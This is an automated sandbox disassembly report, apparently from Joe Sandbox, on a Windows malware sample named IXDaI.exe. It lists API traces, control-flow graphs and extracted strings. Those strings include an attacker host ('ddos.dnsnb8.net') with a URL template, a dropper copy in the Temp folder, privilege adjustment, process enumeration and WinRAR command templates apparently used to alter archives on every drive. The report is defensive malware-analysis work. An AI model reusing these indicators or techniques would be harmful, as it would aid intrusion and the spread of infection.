                                                                                      control_flow_graph 220 ee1000-ee1023 CreateFileA 221 ee1025-ee1055 GetFileSize CreateFileMappingA MapViewOfFile 220->221 222 ee1092-ee1096 220->222 223 ee107b-ee1085 221->223 224 ee1057-ee105f 221->224 227 ee108d-ee1091 CloseHandle 223->227 228 ee1087-ee108b CloseHandle 223->228 225 ee1074-ee1075 UnmapViewOfFile 224->225 226 ee1061-ee106e call ee17d0 224->226 225->223 226->225 227->222 228->227
                                                                                      APIs
                                                                                      • CreateFileA.KERNELBASE(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HG,http://%s:%d/%s/%s,00EE10E8,?), ref: 00EE1018
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,77068400), ref: 00EE1029
                                                                                      • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00EE1038
                                                                                      • MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000000), ref: 00EE104B
                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 00EE1075
                                                                                      • CloseHandle.KERNEL32(?), ref: 00EE108B
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00EE108E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                                                                      • String ID: HG$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                                                      • API String ID: 1223616889-862939041
                                                                                      • Opcode ID: 52838ad02f3d3684acdc1ac60867a9503078163852d33214e946a09c458c09dc
                                                                                      • Instruction ID: 67d177a77e3920164d047b1e383be57d67b3f90b29b733ca3d49d95a6409f6f2
                                                                                      • Opcode Fuzzy Hash: 52838ad02f3d3684acdc1ac60867a9503078163852d33214e946a09c458c09dc
                                                                                      • Instruction Fuzzy Hash: D301217150039DBFE7306F729CC8E2BBBACEB447A9F004669F645B7190D6705E888B60

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 379 ee2b8c-ee2bc6 memset GetLogicalDriveStringsA 380 ee2bc8-ee2bcc 379->380 381 ee2c09-ee2c28 WaitForMultipleObjects 379->381 382 ee2bce-ee2bd0 380->382 383 ee2bfa-ee2c07 lstrlen 380->383 384 ee2c3c-ee2c45 381->384 385 ee2c2a-ee2c3a CreateThread 381->385 382->383 386 ee2bd2-ee2bdc GetDriveTypeA 382->386 383->380 383->381 385->384 386->383 387 ee2bde-ee2be1 386->387 387->383 388 ee2be3-ee2bf6 CreateThread 387->388 388->383
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00EE2BA6
                                                                                      • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00EE2BB4
                                                                                      • GetDriveTypeA.KERNELBASE(?), ref: 00EE2BD3
                                                                                      • CreateThread.KERNELBASE(00000000,00000000,00EE2B7D,?,00000000,00000000), ref: 00EE2BEE
                                                                                      • lstrlen.KERNEL32(?), ref: 00EE2BFB
                                                                                      • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00EE2C16
                                                                                      • CreateThread.KERNELBASE(00000000,00000000,00EE2845,00000000,00000000,00000000), ref: 00EE2C3A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                                                                      • String ID:
                                                                                      • API String ID: 1073171358-0
                                                                                      • Opcode ID: 0388f991db73b3f90053796527c79c8963826046afdd2211a791de722404a885
                                                                                      • Instruction ID: e0970a8ce86c5f7d38cda9fe45c2ec000f0225e59c069367af35924a9afe2c1d
                                                                                      • Opcode Fuzzy Hash: 0388f991db73b3f90053796527c79c8963826046afdd2211a791de722404a885
                                                                                      • Instruction Fuzzy Hash: 2421E7B18001CCAFE7209F669CC4DAE7B6DFB04348B14012DFA42B7161D7348E0ACB61

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 389 ee2c48-ee2c75 memset call ee1973 392 ee2c77-ee2c7f 389->392 393 ee2cb2-ee2cb9 389->393 394 ee2c8f-ee2cac CreateThread WaitForMultipleObjects 392->394 395 ee2c81-ee2c8b 392->395 396 ee2cbb-ee2cc2 VirtualFree 393->396 397 ee2cc8-ee2ccc 393->397 394->393 395->394 396->397
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00EE2C57
                                                                                        • Part of subcall function 00EE1973: PathFileExistsA.KERNELBASE(\N,00000000,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00EE1992
                                                                                        • Part of subcall function 00EE1973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00EE19BA
                                                                                        • Part of subcall function 00EE1973: Sleep.KERNEL32(00000064), ref: 00EE19C6
                                                                                        • Part of subcall function 00EE1973: wsprintfA.USER32 ref: 00EE19EC
                                                                                        • Part of subcall function 00EE1973: CopyFileA.KERNEL32(?,?,00000000), ref: 00EE1A00
                                                                                        • Part of subcall function 00EE1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE1A1E
                                                                                        • Part of subcall function 00EE1973: GetFileSize.KERNEL32(?,00000000), ref: 00EE1A2C
                                                                                        • Part of subcall function 00EE1973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00EE1A46
                                                                                        • Part of subcall function 00EE1973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00EE1A65
                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 00EE2C99
                                                                                      • WaitForMultipleObjects.KERNEL32(00000001,00EE16BA,00000001,000000FF,?,00EE16BA,00000000), ref: 00EE2CAC
                                                                                      • VirtualFree.KERNELBASE(012D0000,00000000,00008000,C:\Users\user\AppData\Local\Temp\IXDaI.exe,00EE4E5C,00EE4E60,?,00EE16BA,00000000), ref: 00EE2CC2
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00EE2C69
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                      • API String ID: 2042498389-699841801
                                                                                      • Opcode ID: 5cf99474c7eb5f674150a6ca58983bb050b6b0124f4598cfcf90f3fde4c0cac8
                                                                                      • Instruction ID: 8d59ae4a61dca96dca1f93bdcea47b86adb26fbf84f134b343c146a3e3e2aae3
                                                                                      • Opcode Fuzzy Hash: 5cf99474c7eb5f674150a6ca58983bb050b6b0124f4598cfcf90f3fde4c0cac8
                                                                                      • Instruction Fuzzy Hash: 2101B1B16012AC7FD6109BA7EC4EEAB7E9CEF41B20F204014B605BA1D1D6A09A04C3A0

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 398 ee2845-ee2855 call ee274a 401 ee2878-ee288a DeleteFileA 398->401 402 ee2857 398->402 404 ee288c-ee2894 VirtualFree 401->404 405 ee289a-ee28a2 401->405 403 ee2865-ee2876 call ee2692 402->403 403->401 410 ee2859-ee2860 call ee239d 403->410 404->405 407 ee28ab-ee28b5 405->407 408 ee28a4-ee28a5 CloseHandle 405->408 408->407 410->403
                                                                                      APIs
                                                                                        • Part of subcall function 00EE274A: memset.MSVCRT ref: 00EE2766
                                                                                        • Part of subcall function 00EE274A: memset.MSVCRT ref: 00EE2774
                                                                                        • Part of subcall function 00EE274A: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00EE2787
                                                                                        • Part of subcall function 00EE274A: wsprintfA.USER32 ref: 00EE27AB
                                                                                        • Part of subcall function 00EE274A: wsprintfA.USER32 ref: 00EE27C6
                                                                                        • Part of subcall function 00EE274A: CopyFileA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\480c1388.exe,00000000), ref: 00EE27D4
                                                                                        • Part of subcall function 00EE274A: wsprintfA.USER32 ref: 00EE27F4
                                                                                        • Part of subcall function 00EE274A: DeleteFileA.KERNEL32(?,?,00EE4E54,00EE4E58), ref: 00EE281A
                                                                                        • Part of subcall function 00EE274A: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00EE4E54,00EE4E58), ref: 00EE2832
                                                                                      • DeleteFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\480c1388.exe), ref: 00EE287D
                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00EE2894
                                                                                      • CloseHandle.KERNEL32(FFFFFFFF), ref: 00EE28A5
                                                                                        • Part of subcall function 00EE2692: CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,774CE800,?,?,00EE29DB,?,00000001), ref: 00EE26A7
                                                                                        • Part of subcall function 00EE2692: WaitForSingleObject.KERNEL32(00000000,000000FF,774CE800,?,?,00EE29DB,?,00000001), ref: 00EE26B5
                                                                                        • Part of subcall function 00EE2692: lstrlen.KERNEL32(?), ref: 00EE26C4
                                                                                        • Part of subcall function 00EE2692: ??2@YAPAXI@Z.MSVCRT ref: 00EE26CE
                                                                                        • Part of subcall function 00EE2692: lstrcpy.KERNEL32(00000004,?), ref: 00EE26E3
                                                                                        • Part of subcall function 00EE2692: SetEvent.KERNEL32 ref: 00EE273C
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\480c1388.exe, xrefs: 00EE2878
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$wsprintf$CreateDeleteEventmemset$??2@CloseCopyFolderFreeHandleObjectPathSingleSpecialVirtualWaitlstrcpylstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\480c1388.exe
                                                                                      • API String ID: 2533558932-4059347755
                                                                                      • Opcode ID: 977395aa11ff83ee3c39dbd944b9eb64c10a45e10c1da078c2bc462ebecf4973
                                                                                      • Instruction ID: 975c5bc501f107f0a74e59bad13c2379a2e5f03cb56125e1e3cb22eef2869c95
                                                                                      • Opcode Fuzzy Hash: 977395aa11ff83ee3c39dbd944b9eb64c10a45e10c1da078c2bc462ebecf4973
                                                                                      • Instruction Fuzzy Hash: 64F054B464038C5FD724AF77AC8EB59339C7B10705F101565B716FB0E0DBB8D5488A55

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 412 ee14e1-ee14fb 413 ee14fd-ee1510 GetModuleHandleA 412->413 414 ee1541-ee1547 412->414 417 ee151a-ee1535 VirtualQuery 413->417 418 ee1512-ee1518 413->418 415 ee1549-ee154c 414->415 416 ee1573-ee157a call ee1638 ExitProcess 414->416 421 ee154e-ee1555 415->421 422 ee1569-ee1570 415->422 419 ee153b 417->419 420 ee1537-ee1539 417->420 418->414 419->414 420->414 420->419 421->422 424 ee1557-ee1566 call ee1af9 421->424 424->422
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00EE1504
                                                                                      • VirtualQuery.KERNEL32(00EE14E1,?,0000001C), ref: 00EE1525
                                                                                      • ExitProcess.KERNEL32 ref: 00EE157A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExitHandleModuleProcessQueryVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 3946701194-0
                                                                                      • Opcode ID: 39934e79a92eb674749e86414edc08344ed7d85112497b6005a6a0653bc6b27d
                                                                                      • Instruction ID: 711bd117af6e493f6a06890a02cca8daeba8648304f8cc7a6d4dcc52a4ebe3f4
                                                                                      • Opcode Fuzzy Hash: 39934e79a92eb674749e86414edc08344ed7d85112497b6005a6a0653bc6b27d
                                                                                      • Instruction Fuzzy Hash: 64115AB1D0028CDFCB21DFA7ACC4A7D77A8EBC8754B10506AF402FA190D27089899B51
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\IXDaI.exe,?,?,?,?,?,?,00EE13EF), ref: 00EE11AB
                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000028,00EE13EF,?,?,?,?,?,?,00EE13EF), ref: 00EE11BB
                                                                                      • AdjustTokenPrivileges.ADVAPI32(00EE13EF,00000000,?,00000010,00000000,00000000), ref: 00EE11EB
                                                                                      • CloseHandle.KERNEL32(00EE13EF), ref: 00EE11FA
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00EE13EF), ref: 00EE1203
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00EE11A5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                      • API String ID: 75692138-699841801
                                                                                      • Opcode ID: 2c9311795e9ddec96c5c1831ce32acf8e58b9d38e1620de04f1c880c77a7fb94
                                                                                      • Instruction ID: 508759efb46a0e4278208e5a5389e03bdc913d9106ee4b8d7ec9141cae11a7cc
                                                                                      • Opcode Fuzzy Hash: 2c9311795e9ddec96c5c1831ce32acf8e58b9d38e1620de04f1c880c77a7fb94
                                                                                      • Instruction Fuzzy Hash: B30100B190024CFFDB10DFE5D989AAEBBB9FB08304F1045A9F606A6250D7709E889B50
                                                                                      APIs
                                                                                      • strstr.MSVCRT ref: 00EE23CC
                                                                                      • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00EE2464
                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00EE2472
                                                                                      • CloseHandle.KERNEL32(?,00000000,00000000), ref: 00EE24A8
                                                                                      • memset.MSVCRT ref: 00EE24B9
                                                                                      • strrchr.MSVCRT ref: 00EE24C9
                                                                                      • wsprintfA.USER32 ref: 00EE24DE
                                                                                      • strrchr.MSVCRT ref: 00EE24ED
                                                                                      • memset.MSVCRT ref: 00EE24F2
                                                                                      • memset.MSVCRT ref: 00EE2505
                                                                                      • wsprintfA.USER32 ref: 00EE2524
                                                                                      • Sleep.KERNEL32(000007D0), ref: 00EE2535
                                                                                      • Sleep.KERNEL32(000007D0), ref: 00EE255D
                                                                                      • memset.MSVCRT ref: 00EE256E
                                                                                      • wsprintfA.USER32 ref: 00EE2585
                                                                                      • memset.MSVCRT ref: 00EE25A6
                                                                                      • wsprintfA.USER32 ref: 00EE25CA
                                                                                      • Sleep.KERNEL32(000007D0), ref: 00EE25D0
                                                                                      • Sleep.KERNEL32(000007D0,?,?), ref: 00EE25E5
                                                                                      • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00EE25FC
                                                                                      • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00EE2611
                                                                                      • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00EE2642
                                                                                      • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00EE265B
                                                                                      • SetEndOfFile.KERNEL32 ref: 00EE266D
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00EE2676
                                                                                      • RemoveDirectoryA.KERNEL32(?), ref: 00EE2681
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                                                                      • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\480c1388.exe
                                                                                      • API String ID: 2203340711-2545203059
                                                                                      • Opcode ID: 5eb11990e49b23f2c9dc090b0ce74257c20a977db5d21361b5b4d4483ee7e2a8
                                                                                      • Instruction ID: 3d1c8375ec8a9f89f42ba6b7fbc6bb7981bc3ec2b623f34a07fe4dafe3f3f2d3
                                                                                      • Opcode Fuzzy Hash: 5eb11990e49b23f2c9dc090b0ce74257c20a977db5d21361b5b4d4483ee7e2a8
                                                                                      • Instruction Fuzzy Hash: 1E81A2B1504389AFD710DF62DC89EABB7ECEB88704F00091DF645B71A0D7749A498B66
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00EE1400), ref: 00EE1226
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00EE122D
                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00EE1400), ref: 00EE123F
                                                                                      • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00EE1400), ref: 00EE1250
                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\IXDaI.exe,?,?,?,?,00EE1400), ref: 00EE129E
                                                                                      • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\IXDaI.exe,?,?,?,?,00EE1400), ref: 00EE12B0
                                                                                      • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXDaI.exe,?,?,?,?,00EE1400), ref: 00EE12F5
                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00EE1400), ref: 00EE130A
                                                                                      Strings
                                                                                      • ntdll.dll, xrefs: 00EE1219
                                                                                      • ZwQuerySystemInformation, xrefs: 00EE1212
                                                                                      • C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00EE1262
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXDaI.exe$ZwQuerySystemInformation$ntdll.dll
                                                                                      • API String ID: 1500695312-3489788173
                                                                                      • Opcode ID: b35786e70baeb3ead714bc179d849b5307b37bde2ab1867b98c73a7cbbc90013
                                                                                      • Instruction ID: bd538df2fb6993de8232526a7fc77478d5a5524639f7efe01985dee75ed43a34
                                                                                      • Opcode Fuzzy Hash: b35786e70baeb3ead714bc179d849b5307b37bde2ab1867b98c73a7cbbc90013
                                                                                      • Instruction Fuzzy Hash: 9A2125306053D9ABD7209B67DC48B6FBAA8FB89B04F100958F645FB250C370DA84D7A5
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00EE18B1
                                                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,774D0F00,77068400), ref: 00EE18D3
                                                                                      • CloseHandle.KERNEL32(I%), ref: 00EE18E9
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EE18F0
                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00EE1901
                                                                                      • CloseHandle.KERNEL32(?), ref: 00EE190A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                                                                      • String ID: I%
                                                                                      • API String ID: 876959470-1881045234
                                                                                      • Opcode ID: 6f3c5be9940572d8a37d10be9a9947709671188b33d718ff54148446519a1f80
                                                                                      • Instruction ID: 3f704840d63bc00b5529793875eed4a5f43c86b2ff8efb16084e8c943c66c7fd
                                                                                      • Opcode Fuzzy Hash: 6f3c5be9940572d8a37d10be9a9947709671188b33d718ff54148446519a1f80
                                                                                      • Instruction Fuzzy Hash: D4015E7290116CBBCB21ABA6DC48DEFBF7DEB85720F104125FA15B61A0D6714A58CAA0
                                                                                      APIs
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,774CE800,?,?,00EE29DB,?,00000001), ref: 00EE26A7
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,774CE800,?,?,00EE29DB,?,00000001), ref: 00EE26B5
                                                                                      • lstrlen.KERNEL32(?), ref: 00EE26C4
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00EE26CE
                                                                                      • lstrcpy.KERNEL32(00000004,?), ref: 00EE26E3
                                                                                      • lstrcpy.KERNEL32(?,00000004), ref: 00EE271F
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00EE272D
                                                                                      • SetEvent.KERNEL32 ref: 00EE273C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 41106472-0
                                                                                      • Opcode ID: 84403d12388d534cd2e79402af084127d6f39dffba42ac66a6eb49dc04f9407e
                                                                                      • Instruction ID: ff4467c1b081f17e6f1160f25e89bd511cb6cee35f668559eb26ab0901d2d9b7
                                                                                      • Opcode Fuzzy Hash: 84403d12388d534cd2e79402af084127d6f39dffba42ac66a6eb49dc04f9407e
                                                                                      • Instruction Fuzzy Hash: 771190B550029CEFCB219F27EC8886A7BAEFB84720710401AF954BF160D7708D89DB90
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrcatmemcpymemsetrandsrand
                                                                                      • String ID: .exe
                                                                                      • API String ID: 122620767-4119554291
                                                                                      • Opcode ID: 77d8dc252feccd93360325806825b18f0536fc90f1b0e2a9de99198526396f6b
                                                                                      • Instruction ID: 400647bc465f109c926c831c93f49e8cadf27d8b31089a9f86a11f34855b24b1
                                                                                      • Opcode Fuzzy Hash: 77d8dc252feccd93360325806825b18f0536fc90f1b0e2a9de99198526396f6b
                                                                                      • Instruction Fuzzy Hash: B0219B72E042DCAED3251337AC84B6A7B849FE3725F2510D9F5913F1E2D27409C98261
